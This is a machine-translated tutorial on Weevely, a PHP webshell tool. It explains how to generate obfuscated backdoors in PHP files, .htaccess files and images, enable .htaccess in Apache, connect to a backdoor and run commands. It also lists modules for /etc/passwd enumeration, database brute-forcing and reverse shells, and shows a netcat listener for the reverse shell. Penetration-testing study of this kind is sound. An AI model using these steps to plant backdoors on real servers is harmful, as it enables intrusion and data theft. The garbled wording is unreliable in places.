Weevely start using notes

-Preface

Weevely is a webshell tool written in Python. It integrates webshell generation and connection and is built in C/S mode. It can be regarded as a replacement tool for PHP kitchen knife in Linux, good concealment (Generating Random ParametersAndBase64EncryptionIn Linux, it is still very powerful (set server error configuration audit, backdoor placement, brute force cracking, file management, resource search, network proxy, command execution, database operations, system information collection, port scanning, and other functions), that is, some modules cannot be used on windows. In general, it is still a very good tool.(It is only used for Safe Learning and Teaching. Illegal use is prohibited).

Project address: http://epinna.github.com/Weevely/
Emilio pinna home: http://disse.cting.org

Test environment: Kali Linux 1.0.6 amd64 + Apache + PHP

1. Generate a backdoor

View weevely help. We can see that weevely can generate three forms of PHP backdoors:

: Generate. php // generate a PHP backdoor File

: Generate. htaccess // Insert the backdoor code to. htaccess. You must enable. htaccess (about. htaccess files)

: Generate. IMG // Insert the backdoor code to the image and modify. htaccess. You must enable. htaccess.

1.1 generate PHP backdoor files

Wevely generates a base64-encrypted backdoor with random parameters:

We have seen that Daniel has separated the encryption module in weevely to encrypt arbitrary webshells. Here is a brief introduction:

Encryption module:

Usage：python test.py intofile  outfile

Test results:

1.2 generate a. htaccess Backdoor

1.3 generate. IMG image Backdoor

2. Connect a backdoor

The connection methods are the same: weevely <URL> <password> is not described here, But. htaccess must be enabled when using. htaccess or image connection:

Under Kali, find the configuration file of apache2 and check the/etc/apache2/apache2.conf file. If no, but it contains multiple configuration files, view them in sequence, the result is found under its contained sites-enabled/. Its absolute path is/etc/apache2/sites-enabled/000-default. Modify the following configuration to support htaccess:

Example of connecting image BACKDOOR:

Of course, weevely also supports direct execution with commands during connection:

~ $ Weevely http: // 127.0.0.1/img_door/1.jpg Linger "ls" // This is the same as the preceding two steps. The preceding Interactive Shell

3. Rich weevely module functions

View the available weevely modules: (you can press the tab key to enter the Console mode)

~ # Weevely help + -------------------- + modules + module | description + ------------------------ + -------------------------------------------------- + |: audit. etcpasswd | enumeration/etc/passwd |: audit. userfiles | lists objects with permissions under a user/home. |: audit. mapwebfiles | enumerate URLs of any web sites |: shell. PHP | compile a PHP file |: shell. sh | write a system script |: system.info | collect system information |: Find. suidsgid | search for SUID/SGID files and directories |: Find. perms | search for readable/Write/executable files and directories with permissions |: backdoor. TCP | TCP port backdoor |: backdoor. reversetcp | rebound TCP connection |: bruteforce. SQL | brute-force password of the specified database username |: bruteforce. sqlusers | cracking all database user passwords |: file. upload | upload a local file |: file. upload2web | upload binary/ASCII files to the destination site folder and enumerate URLs |: file. enum | enumerative remote files in the local vocabulary |: file. read | Read File |: file. rm | delete a file |: file. check | check the status of the Remote File (MD5 value, size, permission, etc.) |: file. download | download remote binary/ASCII files to the local device |: SQL. console | start the SQL console |: SQL. dump | back up the database, that is, database detaching |: net. scan | Port Scan |: net. phpproxy | install a remote php proxy |: net. ifaces | display network interface information of the remote host |: net. proxy | install tunnel communication proxy | + ---------------------- + ---------------------------------------------------- +

Rebound TCP connection to local:

The local listening port 8008 is waiting for connection:

~$ nc -l -p 8008

Establish a TCP connection on weevely:

You can see that the local connection has been established with the remote host:

Enumerate the URL links of any Web site:

:audit.mapwebfiles http://xxx.xxx.xx.xx/index.php http://xxx.xxx.xx.xx /var/www/conf

Upload local files to the specified path on the remote host

Download files from a remote host:

Of course, there are also many powerful functions. In the new version of Kali, it seems that some new modules are added, and the usage is similar. You can view the help ": Help shell. Sh ".

Weevely start using notes